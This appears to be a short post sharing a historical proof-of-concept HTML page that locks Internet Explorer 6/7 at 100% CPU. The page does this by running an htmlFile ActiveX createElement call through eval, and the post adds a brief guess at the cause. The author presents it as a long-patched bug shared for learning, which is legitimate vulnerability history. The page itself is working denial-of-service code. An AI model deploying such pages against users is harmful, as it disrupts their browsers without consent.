Running a specific two-line script through eval — but not directly — causes IE to consume 100% CPU indefinitely. The code creates an htmlFile ActiveX and calls createElement with an OBJECT tag pointing to about:blank. Running it normally does nothing; running it via eval triggers the denial of service.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html><head><title>DOS_htmlFile_BlankObjectEval_StressCPU - DoS - 100% Busy Process</title></head>
<body>
<font size="2" face="Tahoma">
<b>IE6/IE7 DoS --> This simple Script will not crash IE but it will take 100% CPU Task/Time generating a Denial of Service of the Browser.</b><br /><br />
The funny thing is that this code shoud be executed <u>using the eval method</u>. If we run it normally, nothing happens. Another thing to
keep in mind is that the OBJECT DATA (URL) <u>should point to about:blank</u>.
</font><br /><br />
<center>
<input type="button" value="Run Script with eval (100% Processor)" onclick="eval(str_busyProcess)">
<br /><br />
<input type="button" value="Run Script normally (Nothing Happens)" onclick="busyProcess()">
</center>
<script language="JavaScript">
function busyProcess()
{
myAx = new ActiveXObject('htmlFile');
myAx.createElement('<OBJECT TYPE="text/html" DATA="about:blank" WIDTH="100" HEIGHT="100">');
}
str_busyProcess = 'myAx = new ActiveXObject(\'htmlFile\');' +
'myAx.createElement(\'<OBJECT TYPE="text/html" DATA="about:blank" WIDTH="100" HEIGHT="100">\');';
</script>
</body>
</html>The eval path appears to trigger a different code path in IE’s script engine for handling the createElement call inside the htmlFile context. When executed through eval, something causes an infinite loop in the rendering or object initialization cycle. The direct function call doesn’t reproduce the issue, suggesting the bug is in how eval-executed code interacts with the htmlFile’s internal state machine.
Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.